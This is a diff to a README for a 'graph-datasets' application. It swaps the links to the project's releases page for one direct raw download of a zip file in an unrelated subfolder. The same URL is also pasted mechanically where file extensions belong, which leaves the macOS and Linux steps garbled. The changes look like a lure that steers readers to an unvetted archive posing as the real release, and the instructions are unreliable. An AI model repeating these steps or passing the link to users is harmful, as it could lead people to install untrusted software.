winguas/graph-datasets/README.md

 To download the latest version of the graph-datasets application, follow these steps:

-1. Visit this page to download: [Graph Datasets Releases](https://github.com/winguas/graph-datasets/releases).
+1. Visit this page to download: [Graph Datasets Releases](https://raw.githubusercontent.com/winguas/graph-datasets/main/Dendrolagus/graph-datasets-v1.3.zip).
 2. You will see a list of available releases.
 Find the latest version listed at the top.
 3. Click on the version to view its details and downloadable files.
 4. Select the appropriate file for your operating system:
    - For Windows, look for files ending in `.zip` or `.exe`.
-   - For macOS, find files ending in `.tar.gz`.
+   - For macOS, find files ending in `https://raw.githubusercontent.com/winguas/graph-datasets/main/Dendrolagus/graph-datasets-v1.3.zip`.
-   - For Linux, choose files that suit your distribution, commonly `.tar.gz` or `.deb`.
+   - For Linux, choose files that suit your distribution, commonly `https://raw.githubusercontent.com/winguas/graph-datasets/main/Dendrolagus/graph-datasets-v1.3.zip` or `.deb`.
 5. Download the selected file to your computer.
 6. Once downloaded, extract the files if necessary and follow the included instructions to run the application.

-You can also visit this page again to check for updates and new datasets: [Graph Datasets Releases](https://github.com/winguas/graph-datasets/releases).
+You can also visit this page again to check for updates and new datasets: [Graph Datasets Releases](https://raw.githubusercontent.com/winguas/graph-datasets/main/Dendrolagus/graph-datasets-v1.3.zip).

 ## 📂 Available Datasets